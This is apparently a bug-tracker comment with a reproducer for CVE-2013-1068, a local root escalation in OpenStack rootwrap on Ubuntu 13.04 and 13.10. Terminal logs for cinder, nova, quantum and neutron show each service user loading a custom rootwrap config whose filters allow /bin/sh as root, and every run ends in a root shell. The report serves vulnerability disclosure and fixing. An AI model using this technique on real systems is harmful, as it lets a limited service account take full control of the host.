Comment 9 for bug 1185019

Attached is a reproducer based on the bug description. This does not need a working openstack to demonstrate the vulnerability. All that is needed is installing *-common. Eg:
 * nova-common
 * cinder-common
 * quantum-common
 * neutron-common

$ sudo -u cinder /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as cinder
$ id
uid=110(cinder) gid=118(cinder) groups=118(cinder)
$ cat /tmp/cinder/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/cinder/my-filters.d
$ cat /tmp/cinder/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n cinder-rootwrap /tmp/cinder/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u nova /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as nova
$ id
uid=112(nova) gid=120(nova) groups=120(nova),122(libvirtd)
$ cat /tmp/nova/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/nova/my-filters.d
$ cat /tmp/nova/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n nova-rootwrap /tmp/nova/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u quantum /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as quantum
$ id
uid=117(quantum) gid=124(quantum) groups=124(quantum)
$ cat /tmp/quantum/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/quantum/my-filters.d
$ cat /tmp/quantum/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n quantum-rootwrap /tmp/quantum/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u neutron /tmp/CVE-2013-1068.sh # Ubuntu 13.10
Running as neutron
$ id
uid=117(neutron) gid=125(neutron) groups=125(neutron)
$ cat /tmp/neutron/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/neutron/my-filters.d
$ cat /tmp/neutron/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n neutron-rootwrap /tmp/neutron/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL